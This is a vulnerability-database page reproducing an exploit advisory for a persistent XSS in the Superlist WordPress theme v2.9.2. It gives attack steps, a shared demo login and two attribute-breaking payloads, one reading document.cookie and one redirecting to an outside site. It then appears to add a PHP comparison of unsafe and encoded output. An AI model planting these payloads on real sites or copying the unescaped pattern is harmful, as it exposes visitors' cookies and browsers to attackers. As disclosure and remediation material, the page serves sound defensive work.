Superlist - Directory WordPress Theme v2.9.2 Persistent XSS - CXSecurity.com

Vulnerability ID 1844420 Vulnerability type
Published 2019-12-02 Updated 2019-12-02
CVE ID N/A CNNVD-ID N/A
Platform N/A CVSS score N/A
|Vulnerability source
https://cxsecurity.com/issue/WLB-2019120005
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit
# Exploit Title: Superlist - Directory WordPress Theme v2.9.2 Persistent XSS
# Google Dork: /wp-content/themes/superlist/
# Date: 02/12/2019
# Exploit Author: SUBVΞRSΛ
# Vendor Homepage: https://byaviators.com/en/
# Software Link: https://themeforest.net/item/superlist-directory-wordpress-theme/13507181
# Version: 2.9.2 [ 2.880 Sales ]
# Tested on: Parrot OS
# CVE : -
# CWE : 79


----[]- Persistent XSS: -[]----
You need a new basic user account (register your own at https://superlist.byaviators.com/create/?type=job or use mine: subversa/subversa). Then go to https://superlist.byaviators.com/create/?type=job&step=contact, the «Contact» step of the new listing submission. There you'll see the vulnerable input fields, e.g. «Phone». Use a payload like the ones provided below and save your listing. The point is that you need to «break» the «Phone» <a> tag and inject the desired payload inside it. All data from the form steps is stored as a cookie.

Payload Sample #0: " /onmouseover="alert(document.cookie);" /onauxclick="alert(document.domain);"
Payload Sample #1: " /onmouseover="console.log(`SUBVΞRSΛ`);" /onauxclick="alert(`PoC`);window.location.replace(`http://defcon.su`);"
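
For maintainers, the flaw class described above (CWE-79, a stored value written into an `<a>` tag without encoding) is shown next to a hardened form in the added example below; it is not code from the Superlist theme or from the advisory author. The `href="tel:..."` markup and the function names are assumptions made for illustration.

```php
<?php
// Added example: assumed markup and hypothetical function names,
// not the Superlist theme's source.

// Vulnerable pattern: the stored value is concatenated into the attribute
// as-is, so a double quote in the value ends href="..." and whatever
// follows is parsed as new attributes of the <a> tag.
function render_phone_unsafe(string $phone): string {
    return '<a href="tel:' . $phone . '">' . $phone . '</a>';
}

// Input check at save time: accept only characters a phone number needs.
function normalize_phone(string $raw): ?string {
    $raw = trim($raw);
    return preg_match('/^\+?[0-9 ().\-]{3,30}\z/', $raw) === 1 ? $raw : null;
}

// Output encoding at render time: quotes and angle brackets become
// entities, so the value cannot leave the attribute or the text node.
// Inside WordPress, esc_attr() and esc_html() do this job.
function render_phone_safe(string $phone): string {
    $flags  = ENT_QUOTES | ENT_SUBSTITUTE;
    $digits = (string) preg_replace('/[^0-9+]/', '', $phone);
    $attr   = htmlspecialchars($digits, $flags, 'UTF-8');
    $text   = htmlspecialchars($phone, $flags, 'UTF-8');
    return '<a href="tel:' . $attr . '">' . $text . '</a>';
}

$samples = [
    // Constructed benign value.
    '+1 (555) 010-9999',
    // Payload Sample #0 from this page.
    '" /onmouseover="alert(document.cookie);" /onauxclick="alert(document.domain);"',
];

foreach ($samples as $value) {
    echo "input:    $value\n";
    echo "unsafe:   " . render_phone_unsafe($value) . "\n";
    echo "accepted: " . (normalize_phone($value) === null ? 'no' : 'yes') . "\n";
    echo "safe:     " . render_phone_safe($value) . "\n\n";
}
```

Validation at save time and encoding at render time are independent controls; the encoding step is the one that keeps an already stored value from being interpreted as markup.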